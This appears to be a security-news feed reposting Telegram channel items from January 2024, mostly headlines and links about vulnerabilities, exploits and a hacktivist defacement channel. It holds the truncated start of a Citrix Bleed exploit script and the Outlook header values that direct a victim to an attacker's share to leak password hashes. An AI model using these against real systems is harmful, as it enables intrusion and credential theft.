■■■■□ Route-Detect – Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes. https://github.com/mschwager/route-detect https://www.kitploit.com/2024/01/route-detect-find-authentication-authn.html https://t.me/cKure/13428
All posts tagged cyber
January 27, 2024 at 12:35PM
■■■■□ Cyber-War between Israel and Palestine groups. Telegram channel of the hacktivist group that lists mostly defaced websites. ● The channel is not available on Telegram when downloaded from the Google Play Store or from other western / genocide backed tech companies. https://t.me/HizbullahCyb3rTeam https://t.me/cKure/13427
January 26, 2024 at 08:29PM
Citrix Bleed Zero-Day CVE-2023-4966 by AssetNote team.

    #!/usr/bin/env python3
    import sys
    import requests
    import urllib3
    import argparse

    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    parser = argparse.ArgumentParser()
    parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
    args = parser.parse_args()

    if args.target is None:
        print('Target must be provided (e.g. --target 192.168.1.200)')
        sys.exit(0)

    hostname = args.target

    if __name__ == "__main__":…
January 26, 2024 at 11:20AM
■■■■□ 3 Years in Prison for Fraudster Who Drove SMS-Blasting IMSI-Catcher around Norway. https://www.okokrim.no/doemt-til-3-aar-i-fengsel-etter-digitalt-massebedrageri-i-oslo-og-bergen.6643270-549344.html https://commsrisk.com/3-years-in-prison-for-fraudster-who-drove-sms-blasting-imsi-catcher-around-norway/ https://t.me/cKure/13424
January 23, 2024 at 11:52AM
■■■■■ TeamCity Intrusion Saga: APT29 Suspected Among the Attackers Exploiting CVE-2023-42793. https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793 https://t.me/cKure/13422
January 23, 2024 at 08:24AM
■■■□□ How Google’s security engineering team handles rollouts at scale, so we can safely enforce Strict CSP, Trusted Types and other security features on 100s of new services yearly. https://bughunters.google.com/blog/5896512897417216/a-recipe-for-scaling-security https://t.me/cKure/13421
January 23, 2024 at 08:23AM
■■■■□ Domain Escalation – Backup Operator. https://pentestlab.blog/2024/01/22/domain-escalation-backup-operator/ https://t.me/cKure/13420
January 23, 2024 at 08:22AM
Building an Exploit for FortiGate Vulnerability CVE-2023-27997. https://bishopfox.com/blog/building-exploit-fortigate-vulnerability-cve-2023-27997 https://t.me/cKure/13419
January 22, 2024 at 02:28PM
■■■■■ New Outlook Flaw Let Attackers Access Hashed Passwords. The headers that can be used for exploitation are:
● "Content-Class" = "Sharing", which tells Outlook that this email contains sharing content.
● "x-sharing-config-url" = \\(Attacker machine)\a.ics, which points the victim’s Outlook to the attacker’s machine.
https://t.me/cKure/13418
January 22, 2024 at 02:23PM
■■■■□ VMware confirms critical vCenter flaw now exploited in attacks. https://www.bleepingcomputer.com/news/security/vmware-confirms-critical-vcenter-flaw-now-exploited-in-attacks/ https://t.me/cKure/13417
